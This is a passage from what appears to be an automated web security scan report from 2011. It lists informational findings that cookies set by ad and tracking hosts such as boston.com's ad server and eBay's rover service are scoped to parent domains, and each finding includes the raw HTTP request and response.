13.95. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/142449885/LOGO5/boston/m_dunkin020111_bchm_SPONSOR/dunkin_yt_logo100x40.jpg/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/142449885/LOGO5/boston/m_dunkin020111_bchm_SPONSOR/dunkin_yt_logo100x40.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/142449885/LOGO5/boston/m_dunkin020111_bchm_SPONSOR/dunkin_yt_logo100x40.jpg/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.96. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1489951529/HEADLINE1/boston/t_mspca071911_bchm_HEADLINE/234x60_bchm_071911-mspca.html/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1489951529/HEADLINE1/boston/t_mspca071911_bchm_HEADLINE/234x60_bchm_071911-mspca.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1489951529/HEADLINE1/boston/t_mspca071911_bchm_HEADLINE/234x60_bchm_071911-mspca.html/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.97. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1687713133/TILE1/boston/g_globeshoplocal051311_bchm_TILE/shoplocal040510_bchm_TILE.html/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1687713133/TILE1/boston/g_globeshoplocal051311_bchm_TILE/shoplocal040510_bchm_TILE.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1687713133/TILE1/boston/g_globeshoplocal051311_bchm_TILE/shoplocal040510_bchm_TILE.html/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:11 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8J; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.98. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonialniss071911_clst_LEADER/colonial_nissan_071511_lb.jpg/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonialniss071911_clst_LEADER/colonial_nissan_071511_lb.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonialniss071911_clst_LEADER/colonial_nissan_071511_lb.jpg/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:02 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8A; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.99. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/407535735/LOGO9/boston/c_herbcham0311_bchm_LOGO/hc_toyota_062411_video_sponsor_ad.jpg/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/407535735/LOGO9/boston/c_herbcham0311_bchm_LOGO/hc_toyota_062411_video_sponsor_ad.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/407535735/LOGO9/boston/c_herbcham0311_bchm_LOGO/hc_toyota_062411_video_sponsor_ad.jpg/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.100. http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5? HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7; RMFD=011QK73VO205zQN|O105zfl

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:41:51 GMT
Server: Apache
Set-Cookie: RMFD=011QjH71; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 21371
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: application/x-javascript
Connection: Keep-Alive

function OAS_RICH(position) {
if (position == 'TOP') {
document.write ('<A HREF="http://rmedia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonial
...[SNIP]...

13.101. http://rover.ebay.com/rover/1/711-53200-19255-0/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /rover/1/711-53200-19255-0/1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rover/1/711-53200-19255-0/1?type=2&campid=5336216552&customid=842112189&item=120749940240&ext=120749940240 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dp1=bu1p/QEBfX0BAX19AQA**4fe09dfb^; ns1=BAQAAATCQmOoWAAaAANgARk/gnftjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wPysh37l0/bD8OFYXWzauWH5+M/Q*; nonsession=CgADKACBXZWv7YWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTf9xgzLqukJm; npii=btrm/svid%3D943168581484fea87d0^tguid/adb7b0cb1300a0aa15432be3fe5c79844fea87d0^cguid/3666b2e01300a47a44d622a6ffc193724fea87d0^

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9vt*ts67.ad2%60a1a-13143aeae95
Set-Cookie: npii=btpim/14e25d58a^tguid/adb7b0cb1300a0aa15432be3fe5c798450070202^cguid/3666b2e01300a47a44d622a6ffc1937250070202^trm/svid%3D9431685814850070202^; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:35:46 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa ADMa DEVa PSDo PSAa OUR SAMo IND UNI COM NAV INT STA DEM PRE"
Cache-Control: private
Pragma: no-cache
Location: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601616085&item=120749940240
Content-Length: 0
Date: Tue, 19 Jul 2011 18:35:46 GMT


13.102. http://rover.ebay.com/roverimp/0/0/14  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /roverimp/0/0/14

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /roverimp/0/0/14?imp=2041647&lv=tz%3D-5%26lt%3D2011-07-19T18%253A39%253A19%253A494%26ref%3D%26ai%3D520%26res%3D1920x1200%26fla%3Dundefined%26slr%3D0%26scd%3D32%26ctb%3D26259&mpt=1311100759544 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ds2=asotr/b13qzzzzzLCz^; ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; dp1=bpbf/%2320000000000000000450070271^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83641^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702ba^cguid/3666b2e01300a47a44d622a6ffc19372500702ba^trm/svid%3D94316858148500702ba^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000100000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9vt*ts67.ac3g%3C52-13143b1fa46
Set-Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702da^cguid/3666b2e01300a47a44d622a6ffc19372500702da^trm/svid%3D94316858148500702da^; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:22 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa ADMa DEVa PSDo PSAa OUR SAMo IND UNI COM NAV INT STA DEM PRE"
Cache-Control: private, no-cache
Pragma: no-cache
Content-Type: image/gif
Content-Length: 42
Date: Tue, 19 Jul 2011 18:39:22 GMT

GIF89a.............!.......,...........2.;

13.103. http://rover.ebay.com/roversync/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /roversync/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /roversync/?site=0&stg=1&mpt=1311100723361 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ds2=asotr/b13qzzzzzLCz^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5E; ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; dp1=bpbf/%2320000000000000000450070271^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83641^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9un*ts67.adea746-13143b1f1e3
Set-Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702d8^cguid/3666b2e01300a47a44d622a6ffc19372500702d8^trm/svid%3D94316858148500702d8^; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:20 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa ADMa DEVa PSDo PSAa OUR SAMo IND UNI COM NAV INT STA DEM PRE"
Cache-Control: private, no-cache
Pragma: no-cache
Content-Type: image/gif
Content-Length: 42
Date: Tue, 19 Jul 2011 18:39:20 GMT

GIF89a.............!.......,...........2.;

13.104. http://rt.legolas-media.com/lgrt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=53&pbi=36&ord=7973594 HTTP/1.1
Host: rt.legolas-media.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: ui=e01db2f2-208a-43e5-beec-a78df4693afe; lgtix=NQABAAQBBgABAAMBRAQDAPQASQABAAMBSgABAAMBDAABAAMB/QACAAMBXwABAAMB; lgpr=//8=

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:08 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=NQADAAQBBgABAAMBRAQDAPQASQABAAMBSgABAAMBDAABAAMB/QACAAMBXwABAAMB; path=/; expires=Fri, 18 Jul 2014 20:44:08 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 0
Connection: close


13.105. http://s.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.stubhubstatic.com
Path:   /resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js HTTP/1.1
Host: s.stubhubstatic.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:37 GMT
Server: Apache
Set-Cookie: TLTHID=E5780050B23510B2CA4FD1ECACF16CE8; Path=/; Domain=.stubhubstatic.com
Set-Cookie: TLTSID=E5780050B23510B2CA4FD1ECACF16CE8; Path=/; Domain=.stubhubstatic.com
Last-Modified: Wed, 29 Jun 2011 00:07:09 GMT
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Expires: Wed, 18 Jul 2012 18:35:37 GMT
Vary: Accept-Encoding
Content-Length: 73589
Content-Type: text/javascript

if(typeof TeaLeaf==="undefined"){TeaLeaf={};TeaLeaf.Private={};TeaLeaf.tlStartLoad=new Date();if(!TeaLeaf.Configuration){TeaLeaf.Configuration={tlversion:"2011.03.15.1",tlinit:false,tlSDK:false,tlSetG
...[SNIP]...

13.106. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/realnetworks-43000165.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seal-alaskaoregonwesternwashington.bbb.org
Path:   /logo/rbhzbus/realnetworks-43000165.png

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /logo/rbhzbus/realnetworks-43000165.png HTTP/1.1
Host: seal-alaskaoregonwesternwashington.bbb.org
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:47 GMT
Server: Apache
P3P: CP="ALL DSP COR PSAa PSDa OUR NOR ONL UNI COM NAV"
Set-Cookie: logolink=43000165; path=/; domain=alaskaoregonwesternwashington.bbb.org
Set-Cookie: logolink=43000165; path=/; domain=bbb.org
Content-Disposition: inline; filename="seal-for-43000165.png"
Expires: Wed, 20 Jul 2011 03:42:51 GMT
Last-Modified: Tue, 19 Jul 2011 15:42:51 GMT
Etag: 3603dc914d773028caa686e571a980bf
Content-Type: image/png
Content-Length: 8316

.PNG
.
...IHDR.......&........l.. .IDATx...y|T......Y3.C.I......&;........W......._.*..Zw.b-H]...Pd.A.a.....M........L.....b...^...{...'s..9.Y.. L......GH..$..i...8I.......~.
..V.`8.'...Z...]..1x..
...[SNIP]...

13.107. http://secure.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add_code=TM-1&member=364 HTTP/1.1
Host: secure.adnxs.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
